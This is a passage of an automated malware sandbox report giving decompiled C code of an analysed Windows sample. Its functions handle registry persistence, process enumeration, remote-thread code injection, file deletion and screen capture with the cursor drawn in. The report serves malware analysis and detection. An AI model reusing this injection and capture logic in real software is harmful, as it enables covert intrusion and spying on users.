				return _t76;
			}























        0x0040b361
        0x0040b36b
        0x0040b371
        0x0040b37f
        0x0040b387
        0x0040b38f
        0x0040b49c
        0x0040b49c
        0x0040b4a4
        0x0040b4bb
        0x0040b395
        0x0040b399
        0x0040b3a4
        0x0040b3aa
        0x0040b3b3
        0x0040b3b7
        0x0040b3bc
        0x0040b3c7
        0x0040b3cb
        0x0040b3d5
        0x0040b3e3
        0x0040b3e9
        0x0040b3eb
        0x0040b3ed
        0x0040b3ed
        0x0040b3f3
        0x00000000
        0x00000000
        0x0040b41a
        0x0040b41d
        0x0040b42e
        0x0040b432
        0x0040b43e
        0x0040b43f
        0x0040b443
        0x0040b443
        0x0040b44b
        0x0040b451
        0x0040b45d
        0x0040b468
        0x0040b478
        0x0040b482
        0x0040b484
        0x0040b41f
        0x0040b420
        0x00000000
        0x0040b420
        0x0040b486
        0x0040b487
        0x00000000
        0x0040b3fb
        0x0040b404
        0x0040b417
        0x0040b417
        0x00000000
        0x0040b423
        0x0040b423
        0x0040b423
        0x00000000
        0x0040b404
        0x0040b3ed
        0x0040b3cb
        0x0040b48c
        0x0040b48f
        0x0040b497
        0x0040b499
        0x00000000
        0x0040b499
        0x0040b497
        0x0040b4c3

        APIs
        • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 0040B387
        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3AA
        • RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 0040B48F
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0040B3E3
        • StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 0040B40D
        • lstrcpyW.KERNEL32(00000000,?), ref: 0040B44B
        • lstrcpyW.KERNEL32(00000000,00403B2C), ref: 0040B45D
        • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000000,?,?,?,00000000,?), ref: 0040B478
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Value$Querylstrcpy$AllocateCloseCreateHeap
        • String ID:
        • API String ID: 1578894565-0
        • Opcode ID: 2140d7f2d15cc8401083f8ab4f39277a003be0053bfafb938b3a6f2cb05faaa8
        • Instruction ID: cb96c936b7ea4c42502c986684f269d206cb6bbbaf00a83b3d6581d2f158eef4
        • Opcode Fuzzy Hash: 2140d7f2d15cc8401083f8ab4f39277a003be0053bfafb938b3a6f2cb05faaa8
        • Instruction Fuzzy Hash: BD41AB35500014FBCB209BA5DC88EEF7FB9EF44744B008076F505A72A1D775EA11CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B77A, Relevance: 7.6, APIs: 5, Instructions: 62COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040B77A(long _a4, union _SID_NAME_USE _a8) {
				void* _v8;
				short _v528;
				int _t26;
				int _t32;
				union _TOKEN_INFORMATION_CLASS _t33;
				void* _t35;

				_t33 = 0;
				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
					_a4 = 0;
					GetTokenInformation(_v8, 1, 0, 0,  &_a4); // executed
					_t22 = _a4;
					if(_a4 != 0) {
						_t35 = E0040F14B(_t22);
						if(_t35 != 0) {
							_t26 = GetTokenInformation(_v8, 1, _t35, _a4,  &_a4); // executed
							if(_t26 != 0) {
								_a4 = 0x103;
								_t32 = LookupAccountSidW(0,  *_t35, _a8,  &_a4,  &_v528,  &_a4,  &_a8); // executed
								if(_t32 != 0) {
									_t33 = 1;
								}
							}
							E0040F15E(_t35);
						}
					}
					FindCloseChangeNotification(_v8); // executed
				}
				return _t33;
			}









        0x0040b78d
        0x0040b797
        0x0040b7a4
        0x0040b7a7
        0x0040b7ad
        0x0040b7b2
        0x0040b7ba
        0x0040b7be
        0x0040b7cd
        0x0040b7d5
        0x0040b7ed
        0x0040b7f7
        0x0040b7ff
        0x0040b801
        0x0040b801
        0x0040b7ff
        0x0040b804
        0x0040b804
        0x0040b809
        0x0040b80d
        0x0040b80d
        0x0040b817

        APIs
        • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000), ref: 0040B78F
        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0040B7A7
        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040B80D
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?,00000000), ref: 0040B7CD
        • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040B7F7
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Token$Information$AccountAllocateChangeCloseFindHeapLookupNotificationOpenProcess
        • String ID:
        • API String ID: 3037326660-0
        • Opcode ID: d35754d54785953d71cdff8bb753121010e935703a1aa6110ee0ff9ea7e2f695
        • Instruction ID: b2373f3da924d19ed68c6cd84d16c7042f86e4ac8534a0d49ec1cafa0ac56add
        • Opcode Fuzzy Hash: d35754d54785953d71cdff8bb753121010e935703a1aa6110ee0ff9ea7e2f695
        • Instruction Fuzzy Hash: 6A11CBB6500108BBDB11AF90DC85EDA7BADEB04380F108036F909AA191D775DB549BA8
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004067E4, Relevance: 7.5, APIs: 5, Instructions: 49processstringCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E004067E4() {
				short _v524;
				intOrPtr _v552;
				void* _v560;
				void* _t10;
				struct tagPROCESSENTRY32W* _t11;
				int _t15;
				int _t19;
				signed short _t20;
				intOrPtr _t21;
				void* _t22;
				signed short _t24;

				_t20 = 0;
				_v560 = 0x22c;
				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
				_t22 = _t10;
				_t11 =  &_v560;
				Process32FirstW(_t22, _t11); // executed
				if(_t11 != 0) {
					do {
						_t24 = 0;
						if(_v552 != 0) {
							while(1) {
								_t21 =  *0x414ad4; // 0x241f5a8
								_t19 = lstrcmpiW( &_v524,  *(_t21 + ( *(0x401af0 + (_t24 & 0x0000ffff) * 2) & 0x0000ffff) * 4)); // executed
								if(_t19 == 0) {
									break;
								}
								_t24 = _t24 + 1;
								if(_t24 < 2) {
									continue;
								} else {
								}
								goto L7;
							}
							_t20 = 1;
						}
						L7:
						_t15 = Process32NextW(_t22,  &_v560); // executed
					} while (_t15 != 0);
				}
				FindCloseChangeNotification(_t22); // executed
				return _t20;
			}














        0x004067f3
        0x004067f5
        0x004067ff
        0x00406805
        0x00406807
        0x0040680f
        0x00406817
        0x0040681a
        0x0040681a
        0x00406822
        0x00406824
        0x00406824
        0x0040683f
        0x00406847
        0x00000000
        0x00000000
        0x00406849
        0x0040684e
        0x00000000
        0x00000000
        0x00406850
        0x00000000
        0x0040684e
        0x00406852
        0x00406852
        0x00406854
        0x0040685c
        0x00406862
        0x00406866
        0x00406868
        0x00406873

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004067FF
        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040680F
        • lstrcmpiW.KERNELBASE(?,0241F5A8,?,?,00000000), ref: 0040683F
        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040685C
        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00406868
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
        • String ID:
        • API String ID: 545148253-0
        • Opcode ID: dd6914161e8e9203adea9653e70c90f5d78b6172d22da83b63f875d886e21469
        • Instruction ID: 35acf2452c93eeb79a8f0a149dae4cae391aa9f434f1dd701b082c2c4d78efd5
        • Opcode Fuzzy Hash: dd6914161e8e9203adea9653e70c90f5d78b6172d22da83b63f875d886e21469
        • Instruction Fuzzy Hash: FD01B132602124ABDB206BA1ED4CBFB77ACAB85B41F11807AE406E2190D6788855DB68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407DA0, Relevance: 4.6, APIs: 3, Instructions: 52threadCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00407DA0(void* __eax, void* __ecx, intOrPtr _a4, long _a8) {
				char _v5;
				char _v6;
				void* _t11;
				intOrPtr _t12;
				void* _t23;

				_t23 = __eax;
				_v5 = 1;
				_v6 = 0;
				if(__eax != 0) {
					L4:
					_t11 = E00407665(_t23); // executed
					if(_t11 != 0 && RtlCreateUserThread(_t23, 0, 0, 0, 0, 0, _t11 + _a4, 0, 0, 0) == 0) {
						_v6 = 1;
					}
					if(_v5 == 0) {
						FindCloseChangeNotification(_t23); // executed
					}
					_t12 = _v6;
				} else {
					_v5 = 0;
					if(_a8 == 0) {
						L3:
						_t12 = 0;
					} else {
						_t23 = OpenProcess(0x43a, 0, _a8);
						if(_t23 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t12;
			}








        0x00407da8
        0x00407daa
        0x00407dae
        0x00407db3
        0x00407dd6
        0x00407dd7
        0x00407dde
        0x00407df9
        0x00407df9
        0x00407e00
        0x00407e03
        0x00407e03
        0x00407e09
        0x00407db5
        0x00407db5
        0x00407dbb
        0x00407dd2
        0x00407dd2
        0x00407dbd
        0x00407dcc
        0x00407dd0
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00407dd0
        0x00407dbb
        0x00407e0f

        APIs
        • OpenProcess.KERNEL32(0000043A,00000000,?,00407038,00000000,?,?,00406BEC,-0000DC68,00000000,0241F5A8,?,?,?), ref: 00407DC6
        • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407DEF
        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00407038,00000000,?,?,00406BEC,-0000DC68,00000000,0241F5A8,?,?,?), ref: 00407E03
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ChangeCloseCreateFindNotificationOpenProcessThreadUser
        • String ID:
        • API String ID: 307445780-0
        • Opcode ID: 0eb0c21b0a5585bb54d92854748c17eb180424eabf850b45c15d845dffe53570
        • Instruction ID: 2bdbac12452e5e75da079e005a4d96ba9dd6aeff98c1d982260a35fd844296d2
        • Opcode Fuzzy Hash: 0eb0c21b0a5585bb54d92854748c17eb180424eabf850b45c15d845dffe53570
        • Instruction Fuzzy Hash: 1701F7719082887FDB115AA48C86EFF7B6C9F12348B04C0BAE951B3241D27D6E4483FA
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00410093, Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00410093(WCHAR* _a4) {
				signed int _t6;

				SetFileAttributesW(_a4, 0x20); // executed
				_t6 = DeleteFileW(_a4); // executed
				return _t6 & 0xffffff00 | _t6 != 0x00000000;
			}




        0x00410099
        0x004100a3
        0x004100ae

        APIs
        • SetFileAttributesW.KERNELBASE(?,00000020,004120FD,?,?,?,00000000), ref: 00410099
        • DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 004100A3
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$AttributesDelete
        • String ID:
        • API String ID: 2910425767-0
        • Opcode ID: 4104a7cb30020e15b4784b728f104f1066b9e4830a914809844837b0eef5e374
        • Instruction ID: f14d566895ae447b217156bc0b8ee6588b1150b6925b4449eda79f6748290af0
        • Opcode Fuzzy Hash: 4104a7cb30020e15b4784b728f104f1066b9e4830a914809844837b0eef5e374
        • Instruction Fuzzy Hash: CBC04C35204201ABDA011B60ED4AB8E7A65AFD4B41F05C435B14594070D7318960AA09
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040AE3C, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
        Download Yara Rule
        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: FolderPathSpecial
        • String ID:
        • API String ID: 994120019-0
        • Opcode ID: 4aa9e1ff55cceeb0f6f5d56b9a324b23886d77736b2839a0f6ca920ba8c93d5d
        • Instruction ID: 7d4864c7b7c44e9a0af9653d65fc2c656479d13e0f1d86e8f061fcabaeaa6c66
        • Opcode Fuzzy Hash: 4aa9e1ff55cceeb0f6f5d56b9a324b23886d77736b2839a0f6ca920ba8c93d5d
        • Instruction Fuzzy Hash: 48D012B16285105FFB0C4724DC7BFB53354DB94721F06031CB617CF1E0E69138808628
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040F14B, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0040F14B(void* __eax) {
				void* _t3;

				_t3 = RtlAllocateHeap( *0x415fa8, 8, __eax + 4); // executed
				return _t3;
			}




        0x0040f157
        0x0040f15d

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 730c46b804c13298d5f37d6082e359b0b2830845f3f8598c190773a0783341ac
        • Instruction ID: 11f71faade9671c55abd94f71c8cf329e8e06a5e89656a07fb823bf70d92ae39
        • Opcode Fuzzy Hash: 730c46b804c13298d5f37d6082e359b0b2830845f3f8598c190773a0783341ac
        • Instruction Fuzzy Hash: 7DB01130280A00BEFE000B00EC0ABA03A28F38030AF00C030B002E22B0CAA0A8228B08
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 00408DDB, Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 368libraryloaderwindowCOMMON
        Download Yara Rule
        C-Code - Quality: 43%
        			E00408DDB(WCHAR* _a4, char _a8, signed int _a12) {
				void* _v12;
				WCHAR** _v16;
				void* _v20;
				void* _v24;
				_Unknown_base(*)()* _v28;
				struct HDC__* _v32;
				struct tagPOINT _v40;
				_Unknown_base(*)()* _v44;
				intOrPtr _v48;
				_Unknown_base(*)()* _v52;
				_Unknown_base(*)()* _v56;
				_Unknown_base(*)()* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				char _v88;
				_Unknown_base(*)()* _v92;
				intOrPtr _v96;
				char _v124;
				signed int _v128;
				struct HINSTANCE__* _v132;
				struct HINSTANCE__* _v136;
				struct HINSTANCE__* _v140;
				char _v144;
				struct _ICONINFO _v164;
				char _v180;
				intOrPtr _t159;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				_Unknown_base(*)()* _t174;
				intOrPtr _t176;
				intOrPtr _t178;
				_Unknown_base(*)()* _t179;
				intOrPtr _t180;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t194;
				intOrPtr _t196;
				_Unknown_base(*)()* _t197;
				intOrPtr _t202;
				struct HICON__* _t205;
				signed int _t209;
				intOrPtr _t211;
				void* _t216;
				void* _t239;
				intOrPtr* _t240;
				intOrPtr* _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t261;
				void* _t263;
				unsigned int _t270;
				struct HINSTANCE__* _t271;
				struct HINSTANCE__* _t272;
				struct HINSTANCE__* _t273;
				signed int _t274;
				signed int _t275;
				void* _t281;

				_t159 =  *0x414ad4; // 0x241f5a8
				_t271 = LoadLibraryA( *(_t159 + 0x80));
				_t161 =  *0x414ad4; // 0x241f5a8
				_v28 = GetProcAddress(_t271,  *(_t161 + 0x90));
				_t163 =  *0x414ad4; // 0x241f5a8
				_v72 = GetProcAddress(_t271,  *(_t163 + 0x94));
				_t165 =  *0x414ad4; // 0x241f5a8
				_v68 = GetProcAddress(_t271,  *(_t165 + 0x98));
				_t167 =  *0x414ad4; // 0x241f5a8
				_v76 = GetProcAddress(_t271,  *(_t167 + 0x9c));
				_t169 =  *0x414ad4; // 0x241f5a8
				_v80 = GetProcAddress(_t271,  *(_t169 + 0xa0));
				_t171 =  *0x414ad4; // 0x241f5a8
				_v60 = GetProcAddress(_t271,  *(_t171 + 0xa4));
				_t173 =  *0x414ad4; // 0x241f5a8
				_t174 = GetProcAddress(_t271,  *(_t173 + 0xa8));
				_v92 = _t174;
				if(_t271 == 0 || _v28 == 0 || _v72 == 0 || _v68 == 0 || _v76 == 0 || _v80 == 0 || _v60 == 0 || _t174 == 0) {
					L52:
					return 0;
				} else {
					_t176 =  *0x414ad4; // 0x241f5a8
					_t272 = LoadLibraryA( *(_t176 + 0x84));
					_t178 =  *0x414ad4; // 0x241f5a8
					_t179 = GetProcAddress(_t272,  *(_t178 + 0xac));
					_v84 = _t179;
					if(_t272 == 0 || _t179 == 0) {
						goto L52;
					} else {
						_t180 =  *0x414ad4; // 0x241f5a8
						_t273 = LoadLibraryA( *(_t180 + 0x88));
						_t182 =  *0x414ad4; // 0x241f5a8
						_t258 = GetProcAddress(_t273,  *(_t182 + 0xb0));
						_t184 =  *0x414ad4; // 0x241f5a8
						_v16 = GetProcAddress(_t273,  *(_t184 + 0xb4));
						_t186 =  *0x414ad4; // 0x241f5a8
						_v12 = GetProcAddress(_t273,  *(_t186 + 0xb8));
						_t188 =  *0x414ad4; // 0x241f5a8
						_v20 = GetProcAddress(_t273,  *(_t188 + 0xbc));
						_t190 =  *0x414ad4; // 0x241f5a8
						_v44 = GetProcAddress(_t273,  *(_t190 + 0xc0));
						_t192 =  *0x414ad4; // 0x241f5a8
						_v52 = GetProcAddress(_t273,  *(_t192 + 0xc4));
						_t194 =  *0x414ad4; // 0x241f5a8
						_v56 = GetProcAddress(_t273,  *(_t194 + 0xc8));
						_t196 =  *0x414ad4; // 0x241f5a8
						_t197 = GetProcAddress(_t273,  *(_t196 + 0xcc));
						_v64 = _t197;
						if(_t273 == 0 || _t258 == 0 || _v16 == 0 || _v12 == 0 || _v20 == 0 || _v44 == 0 || _v52 == 0 || _v56 == 0 || _t197 == 0) {
							goto L52;
						} else {
							_v24 = 0;
							_v144 = 1;
							_v140 = 0;
							_v136 = 0;
							_v132 = 0;
							if(_a12 != 0 || E0040B6B3() != 0) {
								_push(0);
								_push( &_v144);
								_push( &_v88);
								if(_v28() != 0) {
									goto L51;
								}
								_t202 =  *0x414ad4; // 0x241f5a8
								_t259 =  *_t258( *((intOrPtr*)(_t202 + 0x8c)), 0, 0, 0);
								_v28 = _t259;
								_v32 = _v16(_t259);
								_v40.y = 0;
								_v40.x = 0;
								_t205 = LoadCursorW(0, 0x7f00);
								_v16 = _t205;
								GetIconInfo(_t205,  &_v164);
								GetCursorPos( &_v40);
								if(_a12 == 0) {
									_t209 = _v12(_t259, 8);
									_t274 = _t209;
									_t260 = _v12(_t259, 0xa);
								} else {
									_t274 = _a12 & 0x0000ffff;
									_t260 = _t274;
								}
								_t211 = _v20(_v28, _t274, _t260);
								_v48 = _t211;
								if(_t211 == 0) {
									L50:
									_t152 =  &_v32; // 0x4066e6
									_v64( *_t152);
									_v64(_v28);
									_v72(_v88);
									goto L51;
								} else {
									_t72 =  &_v32; // 0x4066e6
									_v96 = _v44( *_t72, _t211);
									_t216 = 0;
									_t263 = 0;
									if(_a12 != 0) {
										_t270 = (_a12 & 0x0000ffff) >> 1;
										_t216 = _v40.x - _t270;
										_v40.x = _v40.x - _t216;
										_t263 = _v40.y - _t270;
										_v40.y = _v40.y - _t263;
									}
									_v52(_v32, 0, 0, _t274, _t260, _v28, _t216, _t263, 0x40cc0020);
									DrawIcon(_v32, _v40.x - _v164.xHotspot, _v40.y - _v164.yHotspot, _v16);
									_push( &_v12);
									_push(0);
									_push(_v48);
									_v12 = 0;
									if(_v68() != 0 || _v12 == 0) {
										L49:
										_v44(_v32, _v96);
										_v56(_v48);
										goto L50;
									} else {
										_push( &_v20);
										_push( &_a12);
										_a12 = 0;
										_v20 = 0;
										if(_v80() != 0) {
											L48:
											_v76(_v12);
											goto L49;
										}
										_t231 = _v20;
										if(_v20 == 0 || _a12 == 0) {
											goto L48;
										} else {
											_t261 = E0040F14B(_t231);
											if(_t261 == 0) {
												goto L48;
											}
											_v60(_a12, _v20, _t261);
											_t275 = 0;
											if(_a12 <= 0) {
												L40:
												E0040F15E(_t261);
												if(_v20 == 0) {
													_push( &_v24);
													_push(1);
													_push(0);
													if(_v84() == 0 && _v24 != 0) {
														_v128 = 0;
														if(_a8 > 0) {
															E0040F19A( &_v124, 0x401ad8, 0x10);
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x64)) = 4;
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x68)) = 1;
															 *((intOrPtr*)(_t281 + _v128 * 0x1c - 0x60)) =  &_a8;
															_v128 = _v128 + 1;
														}
														_t239 = _v92(_v12, _v24,  &_v180,  &_v128);
														_t240 = _v24;
														if(_t239 == 0) {
															 *((intOrPtr*)( *_t240 + 0x14))(_t240, 0, 0, 0, 0);
														} else {
															 *((intOrPtr*)( *_t240 + 8))(_t240);
															_v24 = 0;
														}
													}
												}
												goto L48;
											}
											_t108 = _t261 + 0x30; // 0x30
											_v16 = _t108;
											while(lstrcmpiW(_a4,  *_v16) != 0) {
												_v16 = _v16 + 0x4c;
												_t275 = _t275 + 1;
												if(_t275 < _a12) {
													continue;
												}
												goto L40;
											}
											E0040F19A( &_v180, _t275 * 0x4c + _t261, 0x10);
											_v20 = 0;
											goto L40;
										}
									}
								}
							} else {
								L51:
								return _v24;
							}
						}
					}
				}
			}









































































        0x00408de4
        0x00408df8
        0x00408dfa
        0x00408e0c
        0x00408e0f
        0x00408e21
        0x00408e24
        0x00408e36
        0x00408e39
        0x00408e4b
        0x00408e4e
        0x00408e60
        0x00408e63
        0x00408e75
        0x00408e78
        0x00408e84
        0x00408e8c
        0x00408e91
        0x0040929c
        0x00000000
        0x00408ed5
        0x00408ed5
        0x00408ee6
        0x00408ee8
        0x00408ef4
        0x00408efa
        0x00408eff
        0x00000000
        0x00408f0d
        0x00408f0d
        0x00408f1e
        0x00408f20
        0x00408f32
        0x00408f34
        0x00408f46
        0x00408f49
        0x00408f5b
        0x00408f5e
        0x00408f70
        0x00408f73
        0x00408f85
        0x00408f88
        0x00408f9a
        0x00408f9d
        0x00408faf
        0x00408fb2
        0x00408fbe
        0x00408fc4
        0x00408fc9
        0x00000000
        0x00409015
        0x00409015
        0x00409018
        0x00409022
        0x00409028
        0x0040902e
        0x00409035
        0x00409044
        0x0040904b
        0x0040904f
        0x00409055
        0x00000000
        0x00000000
        0x0040905b
        0x0040906b
        0x0040906e
        0x0040907a
        0x0040907d
        0x00409080
        0x00409083
        0x00409091
        0x00409094
        0x0040909e
        0x004090a8
        0x004090b5
        0x004090bb
        0x004090c0
        0x004090aa
        0x004090aa
        0x004090ae
        0x004090ae
        0x004090c7
        0x004090ca
        0x004090cf
        0x00409285
        0x00409285
        0x00409288
        0x0040928e
        0x00409294
        0x00000000
        0x004090d5
        0x004090d6
        0x004090dc
        0x004090df
        0x004090e1
        0x004090e7
        0x004090f3
        0x004090f5
        0x004090f7
        0x004090fa
        0x004090fc
        0x004090fc
        0x00409110
        0x0040912d
        0x00409136
        0x00409137
        0x00409138
        0x0040913b
        0x00409143
        0x00409276
        0x0040927c
        0x00409282
        0x00000000
        0x00409152
        0x00409155
        0x00409159
        0x0040915a
        0x0040915d
        0x00409165
        0x00409270
        0x00409273
        0x00000000
        0x00409273
        0x0040916b
        0x00409170
        0x00000000
        0x0040917f
        0x00409184
        0x00409188
        0x00000000
        0x00000000
        0x00409195
        0x00409198
        0x0040919d
        0x004091da
        0x004091db
        0x004091e3
        0x004091ec
        0x004091f0
        0x004091f1
        0x004091f7
        0x004091fe
        0x00409204
        0x00409211
        0x0040921c
        0x0040922a
        0x00409237
        0x0040923b
        0x0040923b
        0x0040924f
        0x00409254
        0x00409257
        0x0040926d
        0x00409259
        0x0040925c
        0x0040925f
        0x0040925f
        0x00409257
        0x004091f7
        0x00000000
        0x004091e3
        0x0040919f
        0x004091a2
        0x004091a5
        0x004091b7
        0x004091bb
        0x004091bf
        0x00000000
        0x00000000
        0x00000000
        0x004091c1
        0x004091d2
        0x004091d7
        0x00000000
        0x004091d7
        0x00409170
        0x00409143
        0x00409297
        0x00409297
        0x00000000
        0x00409297
        0x00409035
        0x00408fc9
        0x00408eff

        APIs
        • LoadLibraryA.KERNELBASE(?), ref: 00408DF2
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E06
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E1B
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E30
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E45
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E5A
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E6F
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408E84
        • LoadLibraryA.KERNELBASE(?), ref: 00408EE0
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408EF4
        • LoadLibraryA.KERNELBASE(?), ref: 00408F18
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F2C
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F40
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F55
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F6A
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F7F
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408F94
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408FA9
        • GetProcAddress.KERNELBASE(00000000,?), ref: 00408FBE
        • LoadCursorW.USER32(00000000,00007F00), ref: 00409083
        • GetIconInfo.USER32(00000000,?), ref: 00409094
        • GetCursorPos.USER32(?), ref: 0040909E
        • DrawIcon.USER32(?,?,?,?), ref: 0040912D
          • Part of subcall function 0040B6B3: OpenWindowStationA.USER32(?,00000000,10000000), ref: 0040B6C7
          • Part of subcall function 0040B6B3: SetProcessWindowStation.USER32(00000000), ref: 0040B6D4
          • Part of subcall function 0040B6B3: OpenDesktopA.USER32(?,00000000,00000000,10000000), ref: 0040B6E9
          • Part of subcall function 0040B6B3: SetThreadDesktop.USER32(00000000), ref: 0040B6F6
          • Part of subcall function 0040B6B3: CloseDesktop.USER32(00000000), ref: 0040B6FF
          • Part of subcall function 0040B6B3: CloseWindowStation.USER32(00000000), ref: 0040B706
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 004091AD
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressProc$Load$DesktopLibraryStationWindow$CloseCursorIconOpen$AllocateDrawHeapInfoProcessThreadlstrcmpi
        • String ID: f@
        • API String ID: 1533534080-2705987885
        • Opcode ID: ed4beb0569255d0ef9b3c07fd4478b2e68f744a44725c32aef4e62fa5e5c180f
        • Instruction ID: a924fc9a4a05040214d4054f3fb834b2b8096d4e87672de3e8ca597625d5da41
        • Opcode Fuzzy Hash: ed4beb0569255d0ef9b3c07fd4478b2e68f744a44725c32aef4e62fa5e5c180f
        • Instruction Fuzzy Hash: F5E1F271901218EFCF11DFA4DD88AEEBBB9FF48700F1584BAF509A6262D7344941CB99
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040B4C6, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 175libraryloaderprocessCOMMON
        Download Yara Rule
        C-Code - Quality: 68%
        			E0040B4C6(long _a4, WCHAR* _a8, WCHAR* _a12) {
				void* _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				struct _PROCESS_INFORMATION _v36;
				struct _STARTUPINFOW _v112;
				int _t48;
				signed int _t63;
				struct HINSTANCE__* _t74;
				_Unknown_base(*)()* _t77;
				long _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				void* _t84;
				void* _t85;
				signed int _t86;
				struct HINSTANCE__* _t87;

				_t81 = 0x44;
				_t86 = 0;
				E0040F21C( &_v112,  &_v112, 0, _t81);
				_v112.cb = _t81;
				_v112.lpDesktop = 0;
				if(_a4 == 0 || ( *0x414be8 & 0x00000001) != 0 || E0040B6B3() == 0) {
					L26:
					_t48 = CreateProcessW(_a8, _a12, 0, 0, 0, 0, 0, 0,  &_v112,  &_v36);
					if(_t48 == 0) {
						return _t48;
					}
					goto L27;
				} else {
					_v16 = 0;
					_t82 = GetProcAddress( *0x414d18, "WTSGetActiveConsoleSessionId");
					if(_t82 == 0) {
						L10:
						_a4 = 0;
